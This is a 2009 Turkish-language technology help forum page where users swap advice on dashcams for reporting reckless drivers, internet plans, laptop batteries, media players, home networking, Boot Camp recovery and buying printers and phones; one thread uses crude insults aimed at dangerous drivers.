Kayit tutmak olmazsa olmaz bir sey degil aslinda, siz boyle serserileri gordugunuz anda plakayi alip polise haber verin, bu trafik canavarlari ya alkolludur, ya babadan araba kacirmis ergendir ya da baba parasiyla milletin hayatina kast eden orospu cocugudur. Polis ileride cevirdigi zaman tipine baktimi anlar ne bok oldugunu zaten.

Coluguyla cocuguyla efendi efendi yolunda giden insanlarin hayatiyla oynamak bu kadar kolay mi..
Tepem atti durduk yere.

edit: Gerci videodaki aracin arka plakasi da yok.
0
msb
(21.08.09)
@msb, çok haklısın valla. duyuruyu yazdıktan sonra yayınlamadan önce yazdığım küfürleri sildim:) piste gel öyle kapışalım desem götleri yemez bunların!
0
🌸ikinoktayedi
(21.08.09)
son kısmına cevap vereyim. yayalara yeşil yanarken ışığı umursamayıp geçide dalanların plakalarını itinayla alıp 155'e ihbar ediyorum. ne kadar dikkate aldıklarını bilmiyorum ama ben görevimi yapıyorum. bugüne kadar 5-6 kere ihbarda bulundum. iki sefer benim adımı ve telefonumu da aldılar, verdim. diğerlerinde adımı falan sormadı hiç (telefonum muhtemelen orada gözüküyordur), aracın plakasını, markasını, rengini sordu, kırmızı ışıkta nerede geçtiğini ve ne istikamete doğru gittiğini sordu ve "tamam ben ilgili ekiplere iletiyorum" dedi. artık ileride çevirip ceza mı yazdılari evlerine ceza makbuzu mu gitti bilmiyorum. siz de gördüğünüz kural ihlalini ve tehlike yaratacak davranışı 155'e ihbar edebilirsiniz. ama bu piç kurusunun plakası da yok galiba. polis elbette kullanır. trafik polisleri yasak yere park etmiş arabaların fotoğrafını çekip ondan sonra ceza yazıyorlar burada. babamın bir arkadaşına da ceza makbuzuyla birlkte kırmızıda geçerken çekilmiş fotoğrafını yollamışlar. teknoloji ilerliyor galiba.
0
kibritsuyu
(21.08.09)
çok çok küçük video kameralar var. onlardan bir tane alıp dikiz aynasının önüne monte edebilirsiniz. genelde pil ile çalışır bunlar ama şarjlı ise muhtemelen araba için çakmak girişi yoktur. bir konvertör alıp şarj aletinin çıkışını buna, konvertörün çıkışını da çakmağa bağlarsanız sorun çözülmüş olur.

not: marka olarak önerebileceğim bir kamera yok malesef, hiç kullanmadım.

bir de şöyle bir önerim var; artık yeni arabaların çoğunda ek donanım olarak ön ve arka tamponda kamera veriliyor. aracınızda böyle bir ek donanım seçeneği varsa, gidip servisten onu taktırabilirsiniz. yoksa da dışarıdan takılabiliyor bu meretler. bir de bir elektronik mühendisi bulun veya bu işlerden anlayan birini, kameranın kaydettiklerini direkt olarak bir hard diske kaydedicek bir cihaz yapsın ve program yazsın. tabi bu çok daha masraflı olur ama işinizi de en iyi bu görür.
0
suursuz deve
(21.08.09)
bu kalem şeklindeki kameralarda kalite yükselmiş rakamlar da gayet okunabiliyor. aracınızın uygun bir yerine koyarsınız her bindiğinizde düğmesine basarsınız kayda başlar önemli birşey yoksa arada silersiniz yeniden kaydedersiniz.

www.dealextreme.com
0
prodeq
(21.08.09)
head cam, helmet cam vs gibi aratabilirsiniz. sportif zimbirtilar var epeyce konuyla ilgili. basit ve konforlu bi çözüm olabilir.www.vholdr.nl gibi türevleri mevcut.
0
turuncu harpagon
(21.08.09)
@turuncu harpagon; çok iyiymiş bu ama biraz pahalı kaçacak gibi, 399TL civarı gitti gidiyor'da.

kalem kameranın şarj ve çözünürlük oranını bilmiyorum, hareket halinde çekim yapılacağı için net çıkmayabilir.

ekonomik ve yaratıcı çözümlere açığım:) başka önerisi olan?
0
🌸ikinoktayedi
(21.08.09)
Eger cekim kalitesi yeterli duzeydeyse kalem kamera guzel ve ekonomik bir fikir. Dikiz aynasinin uzerine buna gore bir montaj sistemi uydurun, orda sabit sekilde dursun (kalem aparatini cikartirsaniz boyut olarak da epeyce kuculur). Videodakine benzer bir surucu gordugunuz zaman calistirirsiniz. Zaten cam gibi kayit yapmasina da gerek yok, siz polislere goruntuyu verin onlar plakayi saptayacaktir arabanin modelinden ve okunan bir-iki plaka harfinden.
0
msb
(21.08.09)
ölür bunlar yakında. öldürmeseler kafi.
0
tulkas
(21.08.09)
(2)

PS3 online oyun veri aktarımı miktarı + uydunet

umut
günde 4saat online callofduty oynasam nasıl bir internet paketi beni paklar?bursaya taşındım. evde telefon yok (: kablonet(uydunet) düşünüyorum. telekomun telefonsuz adsl aboneliği verme efsanesi ne durumda bilmiyorum.10mbit 5-10-15 gb kotalı tarifeler ya da 1-2mbit lik bağlantı düşünüyorum. kaç gü
günde 4saat online callofduty oynasam nasıl bir internet paketi beni paklar?


bursaya taşındım. evde telefon yok (: kablonet(uydunet) düşünüyorum. telekomun telefonsuz adsl aboneliği verme efsanesi ne durumda bilmiyorum.
10mbit 5-10-15 gb kotalı tarifeler ya da 1-2mbit lik bağlantı düşünüyorum. kaç günde bağlarlar ederler mesela bilen varsa ayrıca cevaplarsa sevinirim.
ps3 le online oyun oynandığında kotayı ne kadar zorlar bi fikriniz var mı, asıl bunu merak ediyorum.
film-müzik indirilmeyecek, sadece nette gezinme payı eklenebilir.
ya soru çok uzadı ama çok sıcak.. cuma zaten.. (:
0
umut
(21.08.09)
başvurunuzdan sonraki 3 gün içerisinde gelip bağlıyorlar.
0
bir zamanlar cocuktum
(21.08.09)
cok bir veri aktarimi olmuyor bildigim kadariyla. ayrica cogu servis saglayicida upload miktari kotaya dahil edilmiyor. download da oldukca dusuk (20 kb/sn olsa ortalama 20 x 60 x 60 x 4 = 280 mb x 30 gun = 8.2 gb
bu sadece download kismi. dedigim gibi upload kotaya dahil edilmiyor.

kablonet imkani varsa zaten oyun oynama amacli dusunuyorsaniz onu tercih edin. latency (ping) sureleri daha kisa. yalniz her yerde kablo internet hizmeti verilemiyor, verildiginden emin olun. apartmanda kablo kutusu yoksa baglanmiyor veya cok ugrastiriyor.

soylendigi gibi en gec 3 gun icinde bagliyorlar. genelde cok yogun degillerse bir gun sonra gelip modemi baglayip test ediyorlar.

nette gezinme payi da eklenirse yerinizde olsam sinirsiz abone olurdum. 1mbit veya 2mbit sinirsiz isinizi cok rahat gorur. hem risk yok, istediginiz kadar gezinirsiniz. ( uydunet.net burada tarife asiminda en fazla ne kadar odeyeceginiz ve diger bilgiler mevcut)
0
entrapmen
(21.08.09)
(9)

Dizüstü batarya kullanımını denetleyen bir program?

Manert
Birkaç gün önce internette okumuştum bu program ile ilgili birşeyler ama şu an ismini hatırlayamadım. Bu program, dizüstü bataryasının kullanımını denetliyor. Dizüstünün ne zaman fişini takalm, ne zaman çıkaralım tarzı uyarılar vererek batarya ömürünü uzatıyor. İsmini bilen, bilmiyorsa da başka bir
Birkaç gün önce internette okumuştum bu program ile ilgili birşeyler ama şu an ismini hatırlayamadım. Bu program, dizüstü bataryasının kullanımını denetliyor. Dizüstünün ne zaman fişini takalm, ne zaman çıkaralım tarzı uyarılar vererek batarya ömürünü uzatıyor. İsmini bilen, bilmiyorsa da başka bir program önerebilecek birileri var mı?
0
Manert
(21.08.09)
Program hakkında bilgim yok ama eğer dizüstünü fişe takabiliceğin bir ortamda isen bataryayı çıkarıp kullanmanı öneririm. Batarya dolduktan sonra fişe takılı kalması ömrünü kısaltıyor bildiğim kadarıyla.
0
burka
(21.08.09)
burka'nın dediği gibi yapıyorum ben de, ama doğru mu yapıyorum bilmiyorum. teknosa, bimeks gibi yerlerde de teşhir ürünlerini o şekilde bataryasız kullandıklarını gördüm.
0
ikinoktayedi
(21.08.09)
bataryalarınızı cihazdan çıkartmayınız. sebebi bataryanız ani elektirik gitmelerinde voltaj değişikliklerinde back-up görevi görür ve cihanızı korur. ani elektirik kayıpları anakart HDD yanmalarına sebep olur. en ucuz nb anakartlarının 450 $ olduğunu düşünürsek bırakın bataryanız deforme olsun bu riske girmeyin zaten eski batarya çeşitlerinde kullanmaa bağlı deformeler sık yaşanmakta yeni cihazlarda pek görünmemekte. programa gelince powerXgear diye bir program kullanuyorum asus marka notebookumda çok kullanışlı.
0
bakteric
(21.08.09)
söylenenlere ek olarak...eğer sürekli fişe takabileceğin bir ortamdaysan ve uzun süre hiç pile ihtiyaç duymayacaksan dahi "arada sırada" pili takıp "tam olarak boşalttıktan" sonra şarj edip tekrar kenara koymanı önereceğim.

edit: refresh'lemeden yazmışım.Bakteric'in dediği gibi koruma bakımından çıkarılmaması faydalıdır ama pil ömrü açısından kesinlikle kötü etkiliyor. Karar senin.
0
suda balik
(21.08.09)
hurriyetin internet sitesinde vardı dediğin program geçen...
0
yapcak bisi yok
(21.08.09)
hiç çıkartma derim, ilk alındığında ben de tak çıkar yapıyordum, burada soruldu tartışıldı, farkın çok az olduğuna karar kılındı... ki güzel ülkemde elektriğin ne zaman gideceği hiç belli değil, kaç defa kurtardı o pil beni...
0
late viper
(21.08.09)
@yapcak bisi yok: evet o program. ben en iyisi siteyi bir daha arayayım teşekkürler:)

bu durumda pili tak çıkart yapmaya gerek yok diyorsunuz. Peki o zaman pil şarj olduğunda fişten çekip, pil bittiğinde tekrar fişe takarak mı kullanayım yani?

bir de başka bir yerde okuduğum bir öneriydi, dizüstülerinizi kapattıktan sonra fişten çıkarmayı unutmayın dalgınlıkla falan sonra sürekli şarj olup durur pil:)
0
🌸Manert
(21.08.09)
BatteryCare diye bir program. ben chip te rastlamıştım 2 gün önce indirdim ama pek bir işe yarıyr gbi durmyr. Google da arat çıkıyr...
0
thesL
(21.08.09)
markadan markaya degisiyor o pilin cikarilip cikarilmama durumu. ben 3 senedir bir kere bile elektrikten cekmedim bilgisayari, masaustu laptop olarak kullandigim icin. hala da 2 saat 40 dakika dayanir.
0
osuruklu
(21.08.09)
(1)

yine yeni yeniden laptop sorusu + vodafone teknosa kampanyası.

kibritsuyu
1. vodafone teknosa ile ortak kampanya yapmış. vodafone 3g paketlerine 24 ay üyelik taahhüdü yapana (ki aylık 75 liradan 24 ayda 1800 lira yapıyor) 3g modem + 1000 lira teknosa hediye çeki veriyormuş, ama sadece laptop alırken kullanmak üzere. ben de laptop almayı düşünüyorum. kampanya ile önerilen
1. vodafone teknosa ile ortak kampanya yapmış. vodafone 3g paketlerine 24 ay üyelik taahhüdü yapana (ki aylık 75 liradan 24 ayda 1800 lira yapıyor) 3g modem + 1000 lira teknosa hediye çeki veriyormuş, ama sadece laptop alırken kullanmak üzere. ben de laptop almayı düşünüyorum. kampanya ile önerilen toshiba L500-13T model bir bilgisayar. özellikleri de şöyle: www.teknosa.com

ne dersiniz bu kampanyaya? 1367 liralık bilgisayarı kampanya ile 367 liraya alabiliyoruz.

2. aslında adsl internetim var. öyle çok fazla mobil kullanacağımı da sanmıyorum. 5 gb internet paketine ayda 75 lira vermek pahalı. açıçası kampanyayı düşünmüyorum, öylesine sordum. vodafone kampanyasını boşverelim. sadece bu bilgisayara ne dersiniz? 1367 lira fiyatı var 12 taksitli.

ayrı nümerik klavyesi olması aradığım bir özellik olduğundan çok hoşuma gitti.

not: kırisis mırisis, öyle onun gibi oyunlar oynayacağımı hiç sanmıyorum. ama olur ya "neymiş lan bu" diyip oynamak da aklıma esebilir belli olmaz. yani öyle oyun performansı süper olsun diye bir beklentim yok. ama icabında kastırmasın da. anladın sen.
0
kibritsuyu
(21.08.09)
evet alinabilir. bir toshiba kullanicisi olarak, klavye kullanim rahatligini baska hicbir notebookta bulamadigimi, sirf klavye kullanim & duzeni icin bile tercih edilesi nb oldugunu belirtmekte fayda oldugunu dusunuyorum. ses sistemide sizi memnun edecektir. ati 512 bagimsiz 1367mb'a ram destegi ile cikiyor ki 512 siz oyun oynamadiginiz icin size yetecektir. ustune, xp sp3 modded yada tiny7 (win7) modded kurdugunuzda tadindan yenmez.

ek olarak : hdmi cikisi mevcut. blue'su var. wifi draft+n destekli. sukela. alin. gule gule kullanin.

* hdd'i 5400 rpm. tamamen pil performansi icin 5400 rpm koymuslardir. ilerde 7200 rpm 16mb cache seagate koymayi dusunebilirsiniz. (tavsiye)
0
that was just a dream
(21.08.09)
(3)

Flash templateler, siteler falan...

gercekleracidir
Herkese merhaba. Şimdi efendim http://www.punkreas.org diye bir adres var. Buradaki tasarım çok hoşuma gitti, ben de başka bir proje için buna benzer bir site yapmak istiyorum. yani fotolar olsun, üzerine gelindiğinde yazılar çıksın, hatta o yazılara tıklandığında yeni bir sayfa açılsın. orada da de
Herkese merhaba.

Şimdi efendim www.punkreas.org diye bir adres var. Buradaki tasarım çok hoşuma gitti, ben de başka bir proje için buna benzer bir site yapmak istiyorum. yani fotolar olsun, üzerine gelindiğinde yazılar çıksın, hatta o yazılara tıklandığında yeni bir sayfa açılsın. orada da detaylı yazılar olsun. buna benzer bir flash template'i olan var mıdır acaba? yok ise de elimdeki mevcut flash templatelere, resmin üzerine geldindiği anda yazı çıkma efektini (nasıl bir tanımlamaysa bu :D) nasıl ekleyebilirim? ekleyebilir miyim?
0
gercekleracidir
(21.08.09)
o site flash degil. css le yapilmis. (git: www.bildirgec.org) inceleyin.
0
that was just a dream
(21.08.09)
ayrica o sitede, mouseover oldugunda text gelmiyor. sadece gorsel degisiyor.
bu tarz efektler www.dynamicdrive.com u kullanabilirsin.
0
buyerson
(21.08.09)
that was just a dream'in dediği gibi site css ile tasarlanmış.

Eğer ilginizi çekerse gelişmiş bir javascript kütüphanesi olan jquery ile tasarlanmış şu örnek ilginizi çekebilir.

buildinternet.com - Demo
www.noupe.com - Download (link biraz aşağıda)

Umarım hoşunuza gider.
0
burka
(21.08.09)
(4)

Msn sorusu

guguriguk
Birinin beni msn den silip silmediği nasıl anlaşılır?
Birinin beni msn den silip silmediği nasıl anlaşılır?
0
guguriguk
(21.08.09)
(bkz: msn messenger plus)

bazı siteler de vardı bu işi yapan ama plus iyidir.
0
kerri deadstar
(21.08.09)
birisinin seni msnden silmiş olabileceğini düşünüyorsan çoktan silmiştir

murphy kanunları
0
obez kirpi george
(21.08.09)
kirmizi gul demet demet
(21.08.09)
Sitelere dikkat sonra otomatik mesajlar yollamaya başlıyor msn :)
En iyi yöntem mns içinde
Araçlar>Seçenekler>Gizlilik
Burada isim listesindeki isimlere sağ tıkladığında açılan menude sil seçeneği aktifse silmiştir.Aktif değilse silmemiştir.
0
ilkdefa
(21.08.09)
(6)

uyuz bsplayer'da çizgi sorunu ?

bullet-tooth
selam,bsplayer'da southpark izlerken, resimde gördüğünüz şekilde altta 2-3 tane gri şerit çıkmaya başladı. dizide bi sorun olmadığına eminim. ama bsplayer'da ne yaptıysam bi türlü çözemedim. tam da izlerken olmaz ki. acil yardım bekliyorum.- bu arada vlc player'da da denedim ama onda da altyazı senk
selam,

bsplayer'da southpark izlerken, resimde gördüğünüz şekilde altta 2-3 tane gri şerit çıkmaya başladı. dizide bi sorun olmadığına eminim. ama bsplayer'da ne yaptıysam bi türlü çözemedim. tam da izlerken olmaz ki. acil yardım bekliyorum.


- bu arada vlc player'da da denedim ama onda da altyazı senkronizasyonunu bi türlü beceremedim.
0
bullet-tooth
(21.08.09)
bsplayer'in farklı bir sürümünü indirip kurun.
0
pragmatist kedi
(21.08.09)
sorun nerde? çünkü bütün dizilerde ve filmlerde olan bi şey değil. nadiren oluyo. ama dizide sorun olmadığına da eminim.
0
🌸bullet-tooth
(21.08.09)
codec ile alakalı olabilir. tekrar kurunca büyük ihtimal düzelir.
0
pragmatist kedi
(21.08.09)
codectir, ya direk kmplayer, gom player kur rahat et. hem km beleş :Q
0
yapcak bisi yok
(21.08.09)
(bkz: kmplayer)
0
eleventh american esme has met
(21.08.09)
bsplayer yerine smplayer yada gom player kurup kullanabilirsin ama yok illa bsplayer kullanacağım diyorsan eğer k-lite codec pack'in son sürümünü kurup deneyebilirisin. (kurulu ise kaldır bi daha yükle)
0
roadrunner_merlin
(21.08.09)
(3)

internet mi yavaş

madrigal
ya da bende mi sorun var download hızım 30 kb a kadar düştü, mozilla yavaşladı noluyor ya?teşekkürler.
ya da bende mi sorun var download hızım 30 kb a kadar düştü, mozilla yavaşladı noluyor ya?

teşekkürler.
0
madrigal
(21.08.09)
bende de azcık yavaş ama yan odadan dınk dınk sesleri geliyor . kardeşim uyumamış galiba birşeyler download ediyor ondan olablir

yer : ist dünya
0
alokozay
(21.08.09)
eevet bişi oldu bende de baya yavas
0
all girls dream
(21.08.09)
bi kaç gündür izmirde de yavaşladı yarı yarıya 50kb/s civarına falan düştü 100-110 olması gerekirken.
0
mugenzen
(21.08.09)
(1)

superonline fiberoptik falan filan

electropie
baktım evin hemen arkasındaki sokağı kazıyorlar, tabela koymuşlar "superonline fiberoptik kablo çalışması" diye. zor tuttum kendimi ttnet'i arayıp "kesin hemen sizle tüm ilişkimi" dememek için. neyse, superonline'ın web sitesinden baktım tam anlayamadım, aradım telefonun diğer ucundaki ablayla da pe
baktım evin hemen arkasındaki sokağı kazıyorlar, tabela koymuşlar "superonline fiberoptik kablo çalışması" diye. zor tuttum kendimi ttnet'i arayıp "kesin hemen sizle tüm ilişkimi" dememek için. neyse, superonline'ın web sitesinden baktım tam anlayamadım, aradım telefonun diğer ucundaki ablayla da pek anlaşamadık.

kafama takılan şunlar:

- burdan sonra nasıl işleyecek? evin dibine kadar gelmiş, balkonun altından geçiyor nerdeyse, ama apartmanın altına giren çıkan bir şey var mı bilmiyorum, telefondaki bayan apartmanınızın altına geldiyse yakın zamanda bireysel başvuru yapabilirsiniz falan filan diyor, baktırdım sisteminden sitenin adı çıkmadı. anlaşamadık.

- misal 30 daire toplam; 10 tanesinin toplaşıp başvurması mı gerekecek apartmana kablo soksunlar diye?

- bi de nasıl oluyor da oluyor, doğalgaz gibi kabloyu eve kadar sokuyorlar mı nedir?

- yukarıdakiler o kadar önemli değil de bu aşamadan sonra benim 10 veya 100mbit internete ulaşmam ne kadar sürer? çatlayacam.

- çok saçma oldu sorular ama yeminle kafam basmadı şu fiberoptik meselesine.

teşekkürler şimdiden.
0
electropie
(21.08.09)
siteniz anlaşma yapmış zaten altyapı döşendiyse? binanın içinden(kablo tesisatından) kablo çekecekler evinize.

internet sitesini çok sık güncellemiyor olabilirler. bence site yöneticinize yahut kapıcısına danışın. kablolar döşenirken site ile iletişime muhakkak geçilmiştir. onlar bilir.
0
cro magnon
(21.08.09)
(2)

görev yöneticisi eksik

elif_countess
bilgisayarımda görev yöneticisini açtığımda çıkan pencere sadece bu. nasıl halledebilirim?çok kolaymış sağolun...
bilgisayarımda görev yöneticisini açtığımda çıkan pencere sadece bu.
nasıl halledebilirim?
çok kolaymış sağolun...
0
elif_countess
(21.08.09)
amacın uygulamalara geçmekse sağ sol tuşlarını kullanabilirsin.
0
cagkan
(21.08.09)
yeni mezun oldum, yönetici adayı olarak işe başlamak istiyorum. cv'mi nereye yollayayım?
0
outlawrider
(21.08.09)
(2)

Ağ bağlantı ve paylaşım sorunu

alkolik imam
Selamlar;Ağda ortak 6 kişi ortak kullanıyoruz. Modemden switch'e ethernet ile giriyorum oradan dağıtıyorum. Fakat sık sık ben de bağlantı varken 1-2 kişide bağlantı olmuyor. Bağlantıyı bir süre(3-4gün) aralıksız kullandıktan sonra bir anda bazı kullanıcılarda bağlantı olmayabiliyor.8'li switch, pika
Selamlar;

Ağda ortak 6 kişi ortak kullanıyoruz.

Modemden switch'e ethernet ile giriyorum oradan dağıtıyorum. Fakat sık sık ben de bağlantı varken 1-2 kişide bağlantı olmuyor. Bağlantıyı bir süre(3-4gün) aralıksız kullandıktan sonra bir anda bazı kullanıcılarda bağlantı olmayabiliyor.
8'li switch, pikatel modem kullanıyorum.


Sebebi ne olabilir?
0
alkolik imam
(20.08.09)
evet modem resetlenince düzeliyor.

Fakat ip otomatik alıyor herkes.
0
🌸alkolik imam
(20.08.09)
1) modem fazla isindigi icin olabilir / dik konumda tutmaya ozen gosterin
2) pikatel modemin performansi o kadar olabilir / imkanininz varsa yeni saglam bir modem takviye edin.
3) switch'ten kaynaklanmaz bu problem.
4) statik ip vermeyi deneyin. yine 3-4 gun teste tabi tutun.
5) butun makinalar ayni anda acik mi oluyor 3-4 boyunca, yoksa 1 makina girmesiyle 2 makina netten mi dusuyor. bunun sebebi, netten dusen makinalarin ayni isme sahip olmasindan kaynaklaniyor olabilir. inceleyin.
6) santrale olan uzakliginiz sebebiyle, dsl'de kopmalar meydana geliyor olabilir ki su siralar tt de altyapi calismalari sebebiyle bircok kez kopma yasanabiliyor.
7) @divit arkadasinda dedigi gibi, dhcp lerde ip kira suresi mevcuttur. pikatel modemi inceledigimde, varsayılan (default) 24 saat olarak gozukuyor. sizde farkli olabilir. 74 Saati Maksimum saat/gun ayarlarsaniz sorun kalmayacaktir. (Gelismis Kurulum / Yerel Ag / Dhcp Sunucusu Etkin / Kira Suresi (saat): 720 olarak degistirin.)

edit : bu is sabaha kalmasin [:
0
that was just a dream
(21.08.09)
(1)

Acil yardım... Macbook windows volume'unu sildim!

endenizkizi
nerdem baslasam bilmem ki...bir macbook'um var. hem windows hemi de mac OS X yuklu... idi.zeka kupu bendeniz disk utility'i actım, USB flash bellek'i burdan formatlar mı acaba derken windows yuklu disk'i secmisim. artık ERASE'den mi RAID'den mi hatırlamıyorum bi halt ettim... simdi windows yok... va
nerdem baslasam bilmem ki...

bir macbook'um var. hem windows hemi de mac OS X yuklu... idi.

zeka kupu bendeniz disk utility'i actım, USB flash bellek'i burdan formatlar mı acaba derken windows yuklu disk'i secmisim. artık ERASE'den mi RAID'den mi hatırlamıyorum bi halt ettim... simdi windows yok... var ama yok.

o volume su anda format olarak MAC OS Extended (journaled) olarak gozukuyor. ıcınde de 67.7 MB bilgi var gozukuyor ve windows partition'ı kadar da yer gozukuyor. lakin ne acarken tab tusuna bastıgımda windows var ne de Mac'ten baktıgımda bılgı var.

yok mu bir mac uzmanı... nolur derdime bi care. Bootcamp ile yeni yukleme bile yapmama izin vermiyor...
0
endenizkizi
(20.08.09)
- oncelikle hala kullanmadiysan, bundan sonra backup icin winclone kullan :)
- windows cd/dvd'sini tak, yeniden baslatirken c tusuna (olmadi option tusuna) bas ve cd'den boot et. buradan repair etmeyi dene
- format MAC OS Extended (journaled) gorunuyorsa windows o formatla calismaz, yeniden formatla
- butun bu islemlerden once Mac tarafini da back up'la
- yeniden kurmak icin bootcamp assistant'i kullanmalisin, eski partition'i remove edip yeniden kurabilmen lazim.
0
no avalon
(21.08.09)
(2)

Laser Printer: Hangisini Alırdınız?

boshi
"FAKS" fonksiyonuna sahip bir laser printer alacak olsaydınız aşağıdakilerden hangisini tercih ederdiniz (performans, aksesuar maliyetleri vb. kriterlerle)?*** http://www.hepsiburada.com/canon-i-sensys-mf4140-cok-fonksiyonlu-laser-yazici-/productDetails.aspx?categoryid=6&productid=bd10598*** http://
"FAKS" fonksiyonuna sahip bir laser printer alacak olsaydınız aşağıdakilerden hangisini tercih ederdiniz (performans, aksesuar maliyetleri vb. kriterlerle)?

*** www.hepsiburada.com

*** www.hizlial.com

*** www.eksenbilgisayar.com

Benzer fiyat aralığında başka önerilerinize de açığım. Teşekkürler.
0
boshi
(20.08.09)
KEsinlikle Xerox.

Canon'u hiç düşünmezdim bile çünkü ADF yani otomatik doküman yükleyici yok. Diğer iki ürünün ütünde olan ve aynı anda birden fazla sayfayı faks ya da fotokopi çekme işini sağlayan düzenek candır, canandır, kesinlikle olmazsa olmazdır. Kullandıkça anlarsınız ne kadar önemli olduğuınu.

Lewxmarkta ise usb girişi yok. Bu giriş sayesinde taradığınız evrakları bilgisayarı kullanmadan doğrudan flash diskinize pdf ya da jpg olarak kaydedebilirsinmiz. Bu özellik de çok kullanışlıdır.

Diğer özellikler zaten her makinada vardır muhtemelen.
0
44
(20.08.09)
Ayrıca başka marka olarak bu özellikleri baz alarak değerlendirme yapabilrisiniz. ADF kesinlikle olmalı, usb olmasa da olur diye düşünürseniz kullanmaya başadıktan sonra keşke usb'li alsaymışım dersiniz mutlaka.

Bir yıldır Xerow pe 120i kullanıcısı olarak gayet memnunum. biraz ilk baskı hızından şikayetçiyim, herhalde bu model biraz daha hızlıdır.
0
44
(20.08.09)
(1)

iphone'la sözlük mesajlarını takip etmek

surtunme kuvveti
en kolay nasıl yapılır bu iş? mesaj geldiğinde titreşse falan.. yoksa sözlük kasıyor mail var mı diye sormak zorunda kalacağım :(
en kolay nasıl yapılır bu iş? mesaj geldiğinde titreşse falan.. yoksa sözlük kasıyor mail var mı diye sormak zorunda kalacağım :(
0
surtunme kuvveti
(20.08.09)
Anca sözlük için application yapılırsa olabilir.
0
sheba and the albino girls
(20.08.09)
(7)

Nokia N97 mi Sony Ericsson Satio mu ?

allan quatermain
asagidaki gibi entirim sozlukte olmasina ragmen yine de halkimiz bu konuya ne diyor diye merak etmekteyim.. guzel fikirleri olan shire koyunun cefakar hobbitlerinin cevaplarini beklerim.. sony ericsson satio ile kamera ve dahili depolama unitesi disinda ayni ozelliklere sahiptir.. n97 32 gb hafıza b
asagidaki gibi entirim sozlukte olmasina ragmen yine de halkimiz bu konuya ne diyor diye merak etmekteyim.. guzel fikirleri olan shire koyunun cefakar hobbitlerinin cevaplarini beklerim..

sony ericsson satio ile kamera ve dahili depolama unitesi disinda ayni ozelliklere sahiptir.. n97 32 gb hafıza barındırmakta ve kamerasi 5 megapikselken, satio 2 gb hafıza ve 12.1 megapiksel kamera ozelliklerindedir. her iki telefonda da carl zeiss optikler olmasina ragmen nokianin kamera konusundaki yazılım destegi dusunuldugunde fotograf cekmek isteyenlerin satio tercihi daha dogru olacaktir. bana 5 megapiksel yeterde artar bile, ben hitech bi insanim diyorsaniz n97 tavsiye ederim..

sationun review goruntulerinden sonra cok kaba bi cihaz diyenler olmustu.. n97'nin en, boy ve yukseklik olarak satiodan cok daha buyuk bir cihaz oldugunu da belirtelim. sozlukteki tabiri ile satio bir parmak kalinligindaysa n97 de 1,5 parmak kalinligindadir. sationun kasımda piyasaya cikmasi bekleniyor ve ayni sınıfta olacagindan n97 alacaklarinda fiyatlarin dusmesi acisindan bir sure beklemesi dogru olacaktir..

iki cihaz arasinda kararsiz olanlarin kamera ve diger ozellikler arasinda bir karar vermesi gerekiyor.. 32 gb kulaga oldukca hos gelirken 12,1 megapiksel bir telefonla fotograf makinesi tasimaya da gerek kalmayabilir.

bir de benim gibi odun kıvamında bir insansaniz klavye takımını acmaya alısana kadar kırma riskiniz cok fazla.. nokia logosunun oldugu tarafa dogru acmak gerekiyormus..
0
allan quatermain
(20.08.09)
benim tercihim satio'dan yana olurdu, tabi bunun öncelikli nedeni bir sony manyağı olmamdandır. ayrıca N97!nin klavyesi benim gibi odun yaratılışlı insanlara pek dayanmayacaktır diye düşünüyorum. soruyu foruma çevirmek adına soruyorum; satio türkiye'ye gelir mi ve tahminen fiyatı ne olur?
0
patricia teyze
(20.08.09)
param var ve beklerim diyorsan satio. işlemcisi daha güçlü bi kere.
bu sınıfta samsung hd'yi de düşün derim.
0
kofteburger
(20.08.09)
artık nasıl bir hale geldiysem; fiyatı benzer olduktan sonra iphone'dan başka dokunmatik ekranlı telefon almaya çalışanları garipsiyorum.
iphone alın!
0
insanimsi
(20.08.09)
kasimda cikacagi biliniyor sationun..
amerikayla birlikte avrupada da satisa sunulacagi da soylentiler arasinda bu baglamda kasim ya da aralik ilk yarisinda tr de gelecek diye umuyorum.. fiyat 700 - 800 usd gibi konusuluyor ama belli olmaz bu tip kameraya sahip bi cihaz cikmadi henuz emsalleri de 1500 1700 civarinda bekleyip gorecegiz.. aslinda sony n97, omnia, htc gibi cihazlarda hazır piyasadayken ciddi bi indirime giderse direk alinacak cihaz olur..

islemci ve kamera tercih ettiriyor kendini ama genel ozellikleri ayni diger tarafta 32 gb olayi var ki hdd tasiyorsun yaninda oyle dusun super bisey.. valla acayip kararsizim su gunlerde satio cikmadan da mal gibi gidip n97 almak da istemiyorum.. seytan uzak dur benden..
0
🌸allan quatermain
(20.08.09)
iphone bence klasman disi bi cihaz.. telefonla karsilastirip alinmasi pek mantikli degil ozellikle iphone ihtiyaci duymuyorsa bir kimse neden aldigini da ben anlamiyorum..

telefon ozelliklerine bakilirsa satio dinlenir dinlenir dover iphone'u..
0
🌸allan quatermain
(20.08.09)
telefona birşey olması durumunda en çok bayiliği bulunanı seçmenizi tavsiye ederim ben. ayrıca nokia tanıdık, bildik bir marka.
0
you are my lethe
(20.08.09)
kesinlikle satio.
0
cro magnon
(20.08.09)
(5)

SONY marka dijital fotoğraf makinelerinde hafıza kartı olayı

indeed
Merhaba,Bir arkadaşa hediye olarak Sony w210 marka bir dijital foto makinesi almayı düşünüyorum. Fakat ürün detaylarını karıştırırken hafıza kartı detayı dikkatimi çekti:Memory Stick™ Duo, Memory Stick PRO Duo™. Yüksek Hızlı Memory Stick PRO Duo™ (Hız Avantajı Yoktur), Memory Stick PRO-HG Duoyazıyor
Merhaba,
Bir arkadaşa hediye olarak Sony w210 marka bir dijital foto makinesi almayı düşünüyorum. Fakat ürün detaylarını karıştırırken hafıza kartı detayı dikkatimi çekti:

Memory Stick™ Duo, Memory Stick PRO Duo™. Yüksek Hızlı Memory Stick PRO Duo™ (Hız Avantajı Yoktur), Memory Stick PRO-HG Duo

yazıyor.
Bu ne demektir? SD kart bu sony makinalarla uyumlu değil midir? Bu başka formattaki kartı almak SD den daha pahalıya mı patlar? Makineyle verilen kart sadece 16mblık. Sony marka makine kullanan birileri varsa avantaj/dezavantajlarını söylerse süper olur.
0
indeed
(20.08.09)
SD kart uyumlu değil. başka markalar da üretti mi o modelleri bilmiyorum ama sanırım sadece sony'nin kendi kartları var. dezavantajı, lazım olduğunda sony'e bağımlı kalman, bir yere girip kart alma imkanın daha kısıtlı. avantajı ne bilmiyorum.
pil de aynı şekilde, sony'nin kendi pilleri oluyor sadece.
0
sanal uyku
(20.08.09)
sony ve sandisk olması lazım memory stick alternatifleri olarak.
0
ozdek
(20.08.09)
www.hepsiburada.com
sandisk ve sony varmış. team diye bir markanın da micro sd'den memory stick pro duo'ya dönüştüren adaptörü varmış.
0
